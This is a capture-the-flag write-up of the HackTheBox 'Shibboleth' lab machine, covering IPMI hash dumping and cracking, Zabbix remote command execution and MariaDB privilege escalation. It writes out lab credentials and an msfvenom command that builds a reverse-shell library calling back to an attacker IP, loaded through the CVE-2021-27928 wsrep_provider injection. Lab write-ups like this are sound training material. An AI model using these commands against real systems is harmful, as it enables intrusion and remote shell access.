Shibboleth Hackthebox writeup
In this Box we are going to enumerate a udp port and dump the administrator hash ,then we will crack it , using these credentials we will login to the zabbix web interface , using my exploit for this version of zabbix we will get a low-privilege shell. re-using same password will leverage our access to a user. for the root part we will exploit a vulnerable maria-db version
Scanning :
basic scanning :
nmap -A -T4 10.10.11.124
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htbit was suspicious to have only this port , so i performed a udp scan as well :
sudo nmap -sU 10.10.11.124
PORT STATE SERVICE
623/udp open asf-rmcpwe can add shibboleth.htb to the /etc/hosts and move on to enumeration
Enumeration :
we can start performing some vhost enumeration :
ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://shibboleth.htb -H "Host: FUZZ.shibboleth.htb" -fc 302
monitor [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix [Status: 200, Size: 3686, Words: 192, Lines: 30]and add them to the /etc/hosts as well
10.10.11.124 shibboleth.htb monitor.shibboleth.htb zabbix.shibboleth.htbthe UDP port we have found eariler seems worthy to search for , and you can find this post from Hacktricks
we can use that to find the version first

then we can try that :

seems to be IPMI-2.0 UserAuth , from the same post we can see :

we can try that :

and it retrieves a hash , we can see if we can crack it.
from hashcat wiki here

hashcat -m 7300 hash2 /usr/share/wordlists/rockyou.txt
so now we have these credentials Administrator:ilovepumkinpie1
after this point i performed some enumeration to the IPMI like :
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user listand other But seems i went so far from the foothold :(
now we can take a look at the TCP port 80 we have found earlier
shibboleth.htb is not interesting at all , all pages are static

zabbix.shibboleth.htb has login page so obviously i tried the credentials we have

and we are in :

Foothold:
if you look at the footer you will find the zabbix version:

searching for it i found no exploits , you can start doing your research and will find at the documentation here the web interface can execute remote commands
actually to exploit it you will do a lot of searching in different options at the web page until you find the page.
at this time i was practicing python so why not to write my first published exploit ?

you will find it here

so let’s download it and try using the exploit

and after one minute:

Privilege escalation:
only one user exist which is ipmi_svc , and we have the password from the ipmi right , worthy trying it :

and it works
Root Access
Uploading Linpeas to the Box and start investigating the output :



and as we can see Maria DB is running locally only , and we can see linpeas found the username and the password to connect to the database, we can try interact with it
we can read the file except the comments , hence it won’t be applicable
cat /etc/zabbix/zabbix_server.conf | grep -v "#"
now let’s try interact with it :
# password :bloooarskybluh
mysql -u zabbix -D zabbix -pand we are in :

this Maria-DB version we see at the banner is Vulnerable to OS command injection , and we can find the exploit here
following the steps:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.52 LPORT=1337 -f elf-so -o CVE-2021-27928.soset the listener and move the .so file to the Box. then on the box login to the database then :
MariaDB [zabbix]> SET GLOBAL wsrep_provider="/dev/shm/CVE-2021-27928.so";